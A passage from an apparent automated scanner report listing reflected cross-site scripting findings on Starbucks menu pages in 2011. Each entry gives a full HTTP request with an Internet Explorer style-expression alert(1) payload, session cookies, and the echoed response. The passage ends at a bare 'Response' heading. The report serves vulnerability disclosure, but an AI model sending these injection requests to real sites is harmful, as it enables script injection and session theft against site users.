GET /menu/drinks/espresso/iced-caffe-americano?b26f3"style%3d"x%3aexpression(alert(1))"5d8d8ff815a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:26:51 GMT Connection: close Content-Length: 42566
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano?b26f3"style="x:expression(alert(1))"5d8d8ff815a=1"/> ...[SNIP]...
1.731. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-caffe-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a85b"style%3d"x%3aexpression(alert(1))"5c1bfe82ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a85b"style="x:expression(alert(1))"5c1bfe82ef3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-caffe-latte?2a85b"style%3d"x%3aexpression(alert(1))"5c1bfe82ef3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:26:24 GMT Connection: close Content-Length: 42746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte?2a85b"style="x:expression(alert(1))"5c1bfe82ef3=1"/> ...[SNIP]...
1.732. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-caffe-mocha
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feb2c"style%3d"x%3aexpression(alert(1))"fb386894d81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as feb2c"style="x:expression(alert(1))"fb386894d81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-caffe-mocha?feb2c"style%3d"x%3aexpression(alert(1))"fb386894d81=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:27:08 GMT Connection: close Content-Length: 42988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha?feb2c"style="x:expression(alert(1))"fb386894d81=1"/> ...[SNIP]...
1.733. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-caramel-macchiato
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7963d"style%3d"x%3aexpression(alert(1))"1846f5f581e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7963d"style="x:expression(alert(1))"1846f5f581e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-caramel-macchiato?7963d"style%3d"x%3aexpression(alert(1))"1846f5f581e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:27:15 GMT Connection: close Content-Length: 42903
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato?7963d"style="x:expression(alert(1))"1846f5f581e=1"/> ...[SNIP]...
1.734. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-cinnamon-dolce-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80403"style%3d"x%3aexpression(alert(1))"2617616deb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80403"style="x:expression(alert(1))"2617616deb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-cinnamon-dolce-latte?80403"style%3d"x%3aexpression(alert(1))"2617616deb8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:27:50 GMT Connection: close Content-Length: 43040
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte?80403"style="x:expression(alert(1))"2617616deb8=1"/> ...[SNIP]...
1.735. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-flavored-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e21"style%3d"x%3aexpression(alert(1))"78381d7a361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a2e21"style="x:expression(alert(1))"78381d7a361 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-flavored-latte?a2e21"style%3d"x%3aexpression(alert(1))"78381d7a361=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:27:51 GMT Connection: close Content-Length: 42981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte?a2e21"style="x:expression(alert(1))"78381d7a361=1"/> ...[SNIP]...
1.736. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-gingerbread-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15bbb"style%3d"x%3aexpression(alert(1))"b07d6033aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15bbb"style="x:expression(alert(1))"b07d6033aae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-gingerbread-latte?15bbb"style%3d"x%3aexpression(alert(1))"b07d6033aae=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:27:50 GMT Connection: close Content-Length: 43417
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte?15bbb"style="x:expression(alert(1))"b07d6033aae=1"/> ...[SNIP]...
1.737. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-peppermint-mocha
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cd5e"style%3d"x%3aexpression(alert(1))"741f7a7ef73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3cd5e"style="x:expression(alert(1))"741f7a7ef73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-peppermint-mocha?3cd5e"style%3d"x%3aexpression(alert(1))"741f7a7ef73=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:28:00 GMT Connection: close Content-Length: 43056
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha?3cd5e"style="x:expression(alert(1))"741f7a7ef73=1"/> ...[SNIP]...
1.738. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e18af"style%3d"x%3aexpression(alert(1))"fb96fc1e474 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e18af"style="x:expression(alert(1))"fb96fc1e474 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha?e18af"style%3d"x%3aexpression(alert(1))"fb96fc1e474=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:28:04 GMT Connection: close Content-Length: 43381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha?e18af"style="x:expression(alert(1))"fb96fc1e474=1"/> ...[SNIP]...
1.739. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-pumpkin-spice-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebcde"style%3d"x%3aexpression(alert(1))"7566495fc72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebcde"style="x:expression(alert(1))"7566495fc72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-pumpkin-spice-latte?ebcde"style%3d"x%3aexpression(alert(1))"7566495fc72=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:28:25 GMT Connection: close Content-Length: 43588
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte?ebcde"style="x:expression(alert(1))"7566495fc72=1"/> ...[SNIP]...
1.740. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-skinny-flavored-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63d99"style%3d"x%3aexpression(alert(1))"d163db6da2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 63d99"style="x:expression(alert(1))"d163db6da2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-skinny-flavored-latte?63d99"style%3d"x%3aexpression(alert(1))"d163db6da2d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:27:55 GMT Connection: close Content-Length: 43267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte?63d99"style="x:expression(alert(1))"d163db6da2d=1"/> ...[SNIP]...
1.741. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-toffee-mocha
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fbd"style%3d"x%3aexpression(alert(1))"1ea5a8b090d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29fbd"style="x:expression(alert(1))"1ea5a8b090d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-toffee-mocha?29fbd"style%3d"x%3aexpression(alert(1))"1ea5a8b090d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:28:22 GMT Connection: close Content-Length: 43039
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha?29fbd"style="x:expression(alert(1))"1ea5a8b090d=1"/> ...[SNIP]...
1.742. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-white-chocolate-mocha
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee016"style%3d"x%3aexpression(alert(1))"f40cbb757bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee016"style="x:expression(alert(1))"f40cbb757bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/iced-white-chocolate-mocha?ee016"style%3d"x%3aexpression(alert(1))"f40cbb757bf=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:28:11 GMT Connection: close Content-Length: 43213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha?ee016"style="x:expression(alert(1))"f40cbb757bf=1"/> ...[SNIP]...
1.743. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/peppermint-mocha
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64dcf"style%3d"x%3aexpression(alert(1))"6458be98685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64dcf"style="x:expression(alert(1))"6458be98685 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/peppermint-mocha?64dcf"style%3d"x%3aexpression(alert(1))"6458be98685=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:28:17 GMT Connection: close Content-Length: 43641
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha?64dcf"style="x:expression(alert(1))"6458be98685=1"/> ...[SNIP]...
1.744. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7efd8"style%3d"x%3aexpression(alert(1))"53305b3ac5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7efd8"style="x:expression(alert(1))"53305b3ac5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/peppermint-white-chocolate-mocha?7efd8"style%3d"x%3aexpression(alert(1))"53305b3ac5e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
